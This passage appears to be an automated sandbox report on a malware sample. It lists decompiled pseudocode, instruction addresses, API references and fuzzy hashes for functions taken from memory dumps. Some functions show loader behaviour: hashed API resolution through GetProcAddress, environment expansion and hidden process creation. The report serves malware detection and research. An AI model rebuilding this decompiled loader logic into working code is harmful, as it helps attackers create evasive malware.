										 *0x2c9d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2c9d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02c9ada4
0x02c9adba
0x02c9adc0
0x02c9adc2
0x02c9adc7
0x02c9adcd
0x02c9add2
0x02c9add5
0x02c9ade3
0x02c9adea
0x02c9aded
0x02c9adf0
0x02c9adf1
0x02c9adf4
0x02c9adf7
0x02c9adfa
0x02c9adff
0x02c9ae0e
0x00000000
0x02c9ae14
0x02c9ae1e
0x02c9ae28
0x02c9ae2d
0x02c9ae2f
0x02c9ae39
0x02c9ae3c
0x02c9ae3f
0x02c9ae45
0x02c9ae47
0x02c9ae47
0x02c9ae4a
0x02c9ae4d
0x02c9ae52
0x02c9ae56
0x02c9ae69
0x02c9ae6b
0x02c9af13
0x02c9af13
0x02c9af1a
0x02c9af1d
0x02c9af27
0x02c9af27
0x02c9af2b
0x02c9afa9
0x02c9afac
0x02c9afae
0x02c9afae
0x02c9afb5
0x02c9afb7
0x02c9afc1
0x02c9afc4
0x02c9afc7
0x02c9afc7
0x00000000
0x02c9af2d
0x02c9af30
0x02c9af5e
0x02c9af68
0x02c9af6c
0x02c9af74
0x02c9af77
0x02c9af7e
0x02c9af88
0x02c9af88
0x02c9af8c
0x02c9af91
0x02c9afa0
0x02c9afa6
0x02c9afa6
0x02c9af8c
0x00000000
0x02c9af37
0x02c9af3a
0x02c9af42
0x02c9af57
0x02c9af5c
0x00000000
0x00000000
0x02c9af5c
0x00000000
0x02c9af42
0x02c9af30
0x02c9af2b
0x02c9ae71
0x02c9ae78
0x02c9ae88
0x02c9ae91
0x02c9ae95
0x02c9aed8
0x02c9aee4
0x02c9af0d
0x02c9aee6
0x02c9aeea
0x02c9aef0
0x02c9aef8
0x02c9aefa
0x02c9aefd
0x02c9af03
0x02c9af05
0x02c9af05
0x02c9aef8
0x02c9aeea
0x00000000
0x02c9aee4
0x02c9ae9d
0x02c9aea0
0x02c9aea7
0x02c9aeb7
0x02c9aeba
0x02c9aeca
0x00000000
0x02c9aed0
0x02c9aeb1
0x02c9aeb5
0x00000000
0x00000000
0x00000000
0x02c9aeb5
0x02c9ae82
0x02c9ae86
0x00000000
0x00000000
0x00000000
0x02c9ae86
0x02c9ae5f
0x02c9ae63
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02C9AE0E
LoadLibraryA.KERNEL32(?), ref: 02C9AE8B
GetLastError.KERNEL32 ref: 02C9AE97
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02C9AECA

Strings

@MxtNxt, xrefs: 02C9AE97, 02C9AF6E
$, xrefs: 02C9ADE3

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$@MxtNxt
API String ID: 948315288-3494183316
Opcode ID: 7ff93fc3b1e4453ba45d5ab3bed463be09199364d497de243345ed7a0bfd09bd
Instruction ID: 26200ad31a95449d05b9febfdf9a43dba03195f125092c2188a477d26ace7f42
Opcode Fuzzy Hash: 7ff93fc3b1e4453ba45d5ab3bed463be09199364d497de243345ed7a0bfd09bd
Instruction Fuzzy Hash: 9E812DB6A40205AFDF20DF99D888BADB7F5FF88314F148529E909E7240E771EA15CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1570, Relevance: 19.6, APIs: 13, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B1579
Mailbox.LIBCMTD ref: 6E1B1592
Mailbox.LIBCMTD ref: 6E1B1608
DName::DName.LIBVCRUNTIMED ref: 6E1B1675

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::operator+.LIBCMTD ref: 6E1B1688
DName::operator+.LIBCMTD ref: 6E1B15FF

Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9870
Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9888

DName::operator+.LIBCMTD ref: 6E1B15EC

Part of subcall function 6E1A9820: Mailbox.LIBCMTD ref: 6E1A9830
Part of subcall function 6E1A9820: Mailbox.LIBCMTD ref: 6E1A9848

DName::operator=.LIBVCRUNTIMED ref: 6E1B163C
DName::isEmpty.LIBCMTD ref: 6E1B1646
DName::operator=.LIBVCRUNTIMED ref: 6E1B1654

Part of subcall function 6E1B0FE0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0FEC
Part of subcall function 6E1B0FE0: Mailbox.LIBCMTD ref: 6E1B1044

DName::operator+.LIBCMTD ref: 6E1B169B
Mailbox.LIBCMTD ref: 6E1B16A4
Mailbox.LIBCMTD ref: 6E1B16B0

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Name::operator+$Iterator_baseIterator_base::_NameName::operator=std::_$EmptyName::Name::isNode::makeStatus
String ID:
API String ID: 2733737839-0
Opcode ID: 2f2d5e23cb4141809768e3fdfece1f8fa02de8670207034bde64b317c6de5722
Instruction ID: b6df09dc9a592df8eca1fe8a050d6a688f3a7bb63a1223a3d99c002c674c00ec
Opcode Fuzzy Hash: 2f2d5e23cb4141809768e3fdfece1f8fa02de8670207034bde64b317c6de5722
Instruction Fuzzy Hash: 4941B075E001089BCB04DFE4EDA1EFE7BBDAF45304F148569E612AB180EB712AC4DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC260, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

UnDecorator::doEllipsis.LIBCMTD ref: 6E1AC294
UnDecorator::getArgumentList.LIBCMTD ref: 6E1AC343

Part of subcall function 6E1AC110: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AC120
Part of subcall function 6E1AC110: DName::operator+=.LIBCMTD ref: 6E1AC16C
Part of subcall function 6E1AC110: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AC1D1
Part of subcall function 6E1AC110: Replicator::isFull.LIBCMTD ref: 6E1AC1F7
Part of subcall function 6E1AC110: Replicator::operator+=.LIBCMTD ref: 6E1AC20A
Part of subcall function 6E1AC110: DName::operator=.LIBVCRUNTIMED ref: 6E1AC22B
Part of subcall function 6E1AC110: DName::operator+=.LIBCMTD ref: 6E1AC237
Part of subcall function 6E1AC110: Mailbox.LIBCMTD ref: 6E1AC24A

Mailbox.LIBCMTD ref: 6E1AC388
UnDecorator::doEllipsis.LIBCMTD ref: 6E1AC3A4
DName::operator+.LIBCMTD ref: 6E1AC40E
Mailbox.LIBCMTD ref: 6E1AC417
Mailbox.LIBCMTD ref: 6E1AC435
DName::DName.LIBVCRUNTIMED ref: 6E1AC444

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

Mailbox.LIBCMTD ref: 6E1AC457

Strings

Z, xrefs: 6E1AC376
Z, xrefs: 6E1AC27A

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Decorator::doEllipsisIterator_baseIterator_base::_NameName::operator+=std::_$ArgumentDecorator::getFullListName::Name::operator+Name::operator=Node::makeReplicator::isReplicator::operator+=Status
String ID: Z$Z
API String ID: 3869916097-3829148472
Opcode ID: dc954b50fabf2fb960c222e040f6ac19802329a7c955a5ce4322202544fc9604
Instruction ID: 21627309236c6d515ad0ae3fb6a499cb41cd72361e0b6f653d388b8a9a16b3e9
Opcode Fuzzy Hash: dc954b50fabf2fb960c222e040f6ac19802329a7c955a5ce4322202544fc9604
Instruction Fuzzy Hash: E2611878D00208EFCF44CFE9D990AEDBBF6AF49304F108559E619AB350E7706A84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE7B0, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 171COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMTD ref: 6E1AE7F2

Part of subcall function 6E1A9920: Mailbox.LIBCMTD ref: 6E1A9930
Part of subcall function 6E1A9920: DName::operator+=.LIBCMTD ref: 6E1A993C
Part of subcall function 6E1A9920: Mailbox.LIBCMTD ref: 6E1A9948

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AE802
UnDecorator::doEcsu.LIBCMTD ref: 6E1AE815
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AE854

Strings

W, xrefs: 6E1AE9AF

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Iterator_baseIterator_base::_Mailboxstd::_$Decorator::doEcsuName::operator+Name::operator+=
String ID: W
API String ID: 4208403871-655174618
Opcode ID: b905bd90b7dc110250bf3e37ca7fd7af82c47ca271a318a4677e753519301b65
Instruction ID: 3ee49476963cb005542387b111c8ad93b770e2b8c5b104f5a4bccc6e89e295e1
Opcode Fuzzy Hash: b905bd90b7dc110250bf3e37ca7fd7af82c47ca271a318a4677e753519301b65
Instruction Fuzzy Hash: CF6171B9C00208EFCB55DFE8E850AFDBBB9BF15304F048529E606AA254EB3157C4DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B40B0, Relevance: 16.6, APIs: 11, Instructions: 117COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B40B9
operator+.LIBVCRUNTIMED ref: 6E1B4127

Part of subcall function 6E1A9790: DName::operator+.LIBCMTD ref: 6E1A97B0

Mailbox.LIBCMTD ref: 6E1B4133
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1B4116

Part of subcall function 6E1AE050: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1AE07B
Part of subcall function 6E1AE050: Mailbox.LIBCMTD ref: 6E1AE0C6

Mailbox.LIBCMTD ref: 6E1B4172
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1B41A9
Mailbox.LIBCMTD ref: 6E1B41B5
DName::operator=.LIBVCRUNTIMED ref: 6E1B4202
Mailbox.LIBCMTD ref: 6E1B4225

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$DecoratedDecorator::getName$Iterator_baseIterator_base::_Name::operator+Name::operator=operator+std::_
String ID:
API String ID: 1608807181-0
Opcode ID: b6c9488819200a71b48b16858feda7301f4573a30c70897a6ab4573b52389214
Instruction ID: 808201400c1c2999ac35834a2493428b5164f059ea75ef2a16ef1cdeb2ea7678
Opcode Fuzzy Hash: b6c9488819200a71b48b16858feda7301f4573a30c70897a6ab4573b52389214
Instruction Fuzzy Hash: 204106759042049BDB04CBE4E9F0BFE3BFAAB12314F14C569D51647684FB706AC6EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5D40, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E1B6D52,?,?,?,?,?,?,?,6E1E0DE4,00000002,?,00000000), ref: 6E1B5D80
__invoke_watson_if_error.LIBCMTD ref: 6E1B5E23

Strings

@, xrefs: 6E1B5EEF
@, xrefs: 6E1B5E4C

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: 07076e79b3474868ce973c6de96336857f4ebeebc120c6991415e5e813af2806
Instruction ID: e86318bb0d2674f878f2349048dc2a8eec828aae91567066397aa7f1216ba7a2
Opcode Fuzzy Hash: 07076e79b3474868ce973c6de96336857f4ebeebc120c6991415e5e813af2806
Instruction Fuzzy Hash: 8FD18AB495422DEBDB24DFD4CC49BDAB3B6AB68304F1041E9E6086B280D7709BC4DF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5850, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 296COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E1B6D22,?,?,?,?,?,?,?,6E1E042F,00000002,?,00000000), ref: 6E1B5890
__invoke_watson_if_error.LIBCMTD ref: 6E1B5933

Strings

@, xrefs: 6E1B595C
@, xrefs: 6E1B59F0

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: f4e3e4df114033a1370ded15aa8d5888bca49ee7609da32ce3314e509d1b44ef
Instruction ID: 6a54a305215a4399cbbe173a1e121e5d743a74808d08a9fac1ae7a9ec27025ad
Opcode Fuzzy Hash: f4e3e4df114033a1370ded15aa8d5888bca49ee7609da32ce3314e509d1b44ef
Instruction Fuzzy Hash: 5CD16AB4904229DBDB24CF90CC89BDEB7B6AB69704F1044E9E7096A280D7709BD4DF91

Uniqueness

Uniqueness Score: -1.00%

Function 02C94EEC, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02C94EEC(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02C94896(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02C9A88E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2c9d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2c9d2a4; // 0x24aa5a8
					_t18 = _t47 + 0x2c9e3e6; // 0x73797325
					_t68 = E02C9903C(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2c9d2a4; // 0x24aa5a8
						_t19 = _t50 + 0x2c9e747; // 0x5148cef
						_t20 = _t50 + 0x2c9e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02C99186();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02C99186();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2c9d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02C9A5FA(_t70);
				goto L12;
			}

0x02c94ef4
0x02c94ef4
0x02c94f03
0x02c94f0a
0x02c94f0f
0x02c9501c
0x02c95023
0x02c95023
0x02c94f1e
0x02c94f26
0x02c94f29
0x02c94f2e
0x02c94f43
0x02c94f49
0x02c94f4a
0x02c94f4d
0x02c94f53
0x02c94f56
0x02c94f5b
0x02c94f63
0x02c94f6f
0x02c94f73
0x02c95003
0x02c94f79
0x02c94f79
0x02c94f7e
0x02c94f85
0x02c94f99
0x02c94f9d
0x02c94fec
0x02c94f9f
0x02c94fa0
0x02c94fa7
0x02c94fc0
0x02c94fc2
0x02c94fc6
0x02c94fcd
0x02c94fe7
0x02c94fcf
0x02c94fd8
0x02c94fdd
0x02c94fdd
0x02c94fcd
0x02c94ffb
0x02c94ffb
0x02c94f73
0x02c9500a
0x02c95013
0x02c95017
0x00000000

APIs

Part of subcall function 02C94896: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02C94F08,?,00000001,?,?,00000000,00000000), ref: 02C948BB
Part of subcall function 02C94896: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02C948DD
Part of subcall function 02C94896: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02C948F3
Part of subcall function 02C94896: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02C94909
Part of subcall function 02C94896: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02C9491F
Part of subcall function 02C94896: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02C94935

memset.NTDLL ref: 02C94F56

Part of subcall function 02C9903C: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,02C95D90,63699BCE,02C94CBB,73797325), ref: 02C9904D
Part of subcall function 02C9903C: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02C99067

GetModuleHandleA.KERNEL32(4E52454B,05148CEF,73797325), ref: 02C94F8C
GetProcAddress.KERNEL32(00000000), ref: 02C94F93
HeapFree.KERNEL32(00000000,00000000), ref: 02C94FFB

Part of subcall function 02C99186: GetProcAddress.KERNEL32(36776F57,02C967DC), ref: 02C991A1

CloseHandle.KERNEL32(00000000,00000001), ref: 02C94FD8
CloseHandle.KERNEL32(?), ref: 02C94FDD
GetLastError.KERNEL32(00000001), ref: 02C94FE1

Strings

@MxtNxt, xrefs: 02C94FE1
Uxt, xrefs: 02C94FFB

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Uxt$@MxtNxt
API String ID: 3075724336-2342693527
Opcode ID: c2bbc5ed79f3aa72c00dfd29a094690b644c1f27875b162385ce3beb743f06d9
Instruction ID: 41159268c288e286aed9f7c858edf3c3c4239a30a516910a37ba3baa06f773a3
Opcode Fuzzy Hash: c2bbc5ed79f3aa72c00dfd29a094690b644c1f27875b162385ce3beb743f06d9
Instruction Fuzzy Hash: 57313DB2C00209AFDF21AFA5DD8CE9EBBBDEF48344F014566E606A7110D7319E55DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0980, Relevance: 15.2, APIs: 10, Instructions: 203COMMON

Download Yara Rule

APIs

DName::isEmpty.LIBCMTD ref: 6E1B09C0
operator+.LIBVCRUNTIMED ref: 6E1B0A13
DName::isEmpty.LIBCMTD ref: 6E1B0AD2
operator+.LIBVCRUNTIMED ref: 6E1B0C17

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: EmptyName::isoperator+
String ID:
API String ID: 1193048883-0
Opcode ID: 2e044cbcbc37271ca6a079d0e39f8d601f57c74466d954b88d79dff126e33bf5
Instruction ID: 3e368813ada382e02e81231cdf15eeff0ffb021faff86902814b57836a2c8255
Opcode Fuzzy Hash: 2e044cbcbc37271ca6a079d0e39f8d601f57c74466d954b88d79dff126e33bf5
Instruction Fuzzy Hash: 6C717875904104EFCB44CFE8EAA0AFE7BBAAF55304F10C569F6059B281E7719AC1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7960, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIMED ref: 6E1A796A

Part of subcall function 6E1A85C0: __guard_icall_checks_enforced.LIBCMTD ref: 6E1A85C6

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7972
__FrameHandler3::isEHs.LIBVCRUNTIMED ref: 6E1A79AA
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 6E1A79F4
_Smanip.LIBCPMTD ref: 6E1A7A0F
__FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 6E1A7A5E

Strings

csm, xrefs: 6E1A7A74
csm, xrefs: 6E1A7980

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
String ID: csm$csm
API String ID: 2671830719-3733052814
Opcode ID: aa2840e28286c8f098a7c40dcbbadbff355a196f96eb3627693a9d4ac43224cc
Instruction ID: c2eaa4f083314abd048b26f41e002cf8f99d28ff7fdb4924aaf077470645aaf3
Opcode Fuzzy Hash: aa2840e28286c8f098a7c40dcbbadbff355a196f96eb3627693a9d4ac43224cc
Instruction Fuzzy Hash: D55141B9A00109ABDB04CFD8D895EFF77BDAF58304F148519FA098B284D734EA91DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A76E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A76F7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7702

Strings

RCC, xrefs: 6E1A7726
MOC, xrefs: 6E1A771B

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: MOC$RCC
API String ID: 984050374-2084237596
Opcode ID: f1e9a66609e8aed6f777036c6d297fddcd955a55f85439bd348ecd303540d648
Instruction ID: 664a4baba7a2f391da8b36783e2cc19477a6519c4e19b16372de6ba0e53e3b7e
Opcode Fuzzy Hash: f1e9a66609e8aed6f777036c6d297fddcd955a55f85439bd348ecd303540d648
Instruction Fuzzy Hash: 37510079A00109EBDB04CFDCC990EFE73B9AF58304F50855AEA1597294D734EE81DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AEED0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1AEEF4

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::DName.LIBVCRUNTIMED ref: 6E1AEF49

Strings

A, xrefs: 6E1AEFDB

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Node::makeStatus
String ID: A
API String ID: 3739413223-3554254475
Opcode ID: e0191008a7d8d8282b3f865bdc868991a0566722a55a9635688b99d6525aa5b5
Instruction ID: 295d1a7aa354ff1b6de11cb79fc473d2bf6145ce528e398fbc94b2a37c858a2e
Opcode Fuzzy Hash: e0191008a7d8d8282b3f865bdc868991a0566722a55a9635688b99d6525aa5b5
Instruction Fuzzy Hash: B851D174D04208DFCF04DFE8D9948EEBBBABF59304F148459E6099B244DB319A85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1F50, Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1B1F8C
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B2003
Mailbox.LIBCMTD ref: 6E1B203F
Mailbox.LIBCMTD ref: 6E1B205A
DName::isEmpty.LIBCMTD ref: 6E1B2062
DName::operator+=.LIBCMTD ref: 6E1B207F
DName::operator+=.LIBCMTD ref: 6E1B20AE
DName::operator+=.LIBCMTD ref: 6E1B20B8
Mailbox.LIBCMTD ref: 6E1B2101

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: MailboxName::operator+=$EmptyIterator_baseIterator_base::_NameName::Name::isstd::_
String ID:
API String ID: 3761117093-0
Opcode ID: 140536acc5319b1dfc6cc99f96f3790fe066b859482d7ffc4dde5f172929dff3
Instruction ID: 16a8e8c77ace869a9fd783eac7b0bd4433ef61cd470d080bf668cd705b2ef616
Opcode Fuzzy Hash: 140536acc5319b1dfc6cc99f96f3790fe066b859482d7ffc4dde5f172929dff3
Instruction Fuzzy Hash: EB519274D402149BCF04DFA4E9A4BFE77BABB56304F108259D612972C0DB716AC9DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0C30, Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

DName::isEmpty.LIBCMTD ref: 6E1B0C95
DName::isEmpty.LIBCMTD ref: 6E1B0CA1
DName::isEmpty.LIBCMTD ref: 6E1B0CC5
DName::DName.LIBVCRUNTIMED ref: 6E1B0D44
DName::isEmpty.LIBCMTD ref: 6E1B0D58
DName::isEmpty.LIBCMTD ref: 6E1B0D70
DName::isEmpty.LIBCMTD ref: 6E1B0D7C
DName::operator+=.LIBCMTD ref: 6E1B0D8A
Mailbox.LIBCMTD ref: 6E1B0DA2

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: EmptyName::is$MailboxNameName::Name::operator+=
String ID:
API String ID: 2270187897-0
Opcode ID: 8814689bb926a28898ce4fe47d7206602160c8876b8d76ed949b95f103dda0a9
Instruction ID: 79bbb4308a5747d6562310925a628dd483a46b21cbc42e10c9b8c693384c5060
Opcode Fuzzy Hash: 8814689bb926a28898ce4fe47d7206602160c8876b8d76ed949b95f103dda0a9
Instruction Fuzzy Hash: B441C575A10109DBCB04CFD8DAA49EF73B9AF44304F108958EA169B290FB70EEC0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C94744, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E02C94744(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2c9d33c; // 0x5149bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02C966E7(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2c9c1ac;
				}
				_t46 = E02C992DB(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02C97E20(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2c9d2a4; // 0x24aa5a8
						_t16 = _t75 + 0x2c9eb28; // 0x530025
						 *0x2c9d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02C966E7(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2c9c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02C97E20(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02C9A5FA(_v20);
						} else {
							_t66 =  *0x2c9d2a4; // 0x24aa5a8
							_t31 = _t66 + 0x2c9ec48; // 0x73006d
							 *0x2c9d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02C9A5FA(_v12);
				}
				return _v24;
			}

0x02c9474c
0x02c94752
0x02c94759
0x02c9475f
0x02c94763
0x02c94767
0x02c9476a
0x02c9476f
0x02c94774
0x02c94776
0x02c94776
0x02c9477f
0x02c94784
0x02c94789
0x02c9478f
0x02c94799
0x02c947a2
0x02c947a9
0x02c947c2
0x02c947c7
0x02c947cc
0x02c947d5
